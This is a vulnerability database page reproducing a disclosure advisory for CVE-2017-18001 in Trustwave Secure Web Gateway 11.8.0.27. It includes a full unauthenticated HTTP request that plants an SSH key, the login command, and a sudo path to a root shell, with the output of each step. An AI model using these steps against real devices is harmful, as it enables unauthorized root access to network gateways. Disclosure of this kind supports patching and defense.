Vulners
Lucene search
Trustwave SWG 11.8.0.27 - SSH Unauthorized Access
| Reporter | Title | Published | Views | Family All 6 |
|---|---|---|---|---|
 | Trustwave Secure Web Gateway Elevation of Privilege Vulnerability | 2 Jan 201800:00 | – | cnvd |
 | CVE-2017-18001 | 31 Dec 201719:00 | – | cve |
 | CVE-2017-18001 | 31 Dec 201719:00 | – | cvelist |
 | Trustwave SWG 11.8.0.27 - SSH Unauthorized Access | 26 Dec 201700:00 | – | exploitpack |
 | CVE-2017-18001 | 31 Dec 201719:29 | – | nvd |
 | Design/Logic Flaw | 31 Dec 201719:29 | – | prion |
## Vulnerability Summary
The following advisory describes an unauthorized access vulnerability that allows an unauthenticated user to add their own SSH key to a remote Trustwave SWG version 11.8.0.27.
Trustwave Secure Web Gateway (SWG) “provides distributed enterprises effective real-time protection against dynamic new malware, strong policy enforcement, and a unique Zero-Malware Guarantee when managed for you by our experts.”
## Credit
An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
## Vendor response
Trustwave was informed of the vulnerability, and released the following advisory: https://www.trustwave.com/Resources/Trustwave-Software-Updates/Important-Security-Update-for-Trustwave-Secure-Web-Gateway/
CVE: CVE-2017-18001
## Vulnerability details
Trustwave SWG allows remote attackers to send to the SWG product a SSH key that will be used by the SWG product as the SSH key to logon to the device.
This allows unauthenticated user to send a POST request to /sendKey
```
POST /sendKey HTTP/1.1
Host: trustwave.device:5222
Content-Length: 558
content-type: multipart/form-data
user-agent: libwww-perl/6.15
Connection: close
--xYzZY
Content-Disposition: form-data; name="publicKey"; filename="public_key_to_send"
Content-Type: text/plain
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFxLGHCIST4jLDreJoQZnIZX6Fcx/ZyM1dzR2ZSwPG7UC3GYs61/cRGFvL9yuPZwIn8f/p9MCMoKHIG1gNZu0i7pqqZgB5vL+Dbf1vXl4PLY0wwcNMyVUBJaTSHdHSqe1KGBcM/1/gMsGpgcOJw2XMNubmXZxRSFSQLca1BsDmEyPF1KVpGfk60GtEH+c5E6ScEaTP7h0NcM6zEl9gubO2R+cq9FsPcMwF4bdsxyEZYGtVdS8B4goewEt1Nj+1hAzBWGox+hySee0QshZFAvZUrfcn4TsOd1iT95jAFoIDReQn781hmT6YQBpnl7HbDp6otyXAxrsvMOg1fvriAzHv rsyncuser
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
--xYzZY--
```
Which will add the supplied ssh key to Trustwave SWG, which we can use it to login to the device:
```
/usr/bin/ssh -q -o PasswordAuthentication=no -o StrictHostKeyChecking=no -o ConnectTimeout=3 -o ServerAliveInterval=10 -i ./test.key [email protected]
Last login: Fri Aug 25 9:01:23 2017 from x.x.x.x
SWG Version : 11.8.0.27
SWG Maintenance Release : 0
Role : vs
Machine Type : NG-6000
```
If we will run the id command via ssh we will get the following response:
```
-sh-4.1$ id
uid=1000(rsyncuser) gid=48(apache) groups=48(apache)
```
Once we connected to Trustwave SWG via SSH we can run commands as root by accessing /opt/finjan/msh/run_inside.py
```
# sudo /opt/finjan/msh/run_inside.py bash
bash-4.1# id
uid=0(root) gid=0(root) groups=0(root)
```Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Dec 2017 00:00Current
9.7High risk
Vulners AI Score9.7
CVSS 39.8
CVSS 210
EPSS0.23034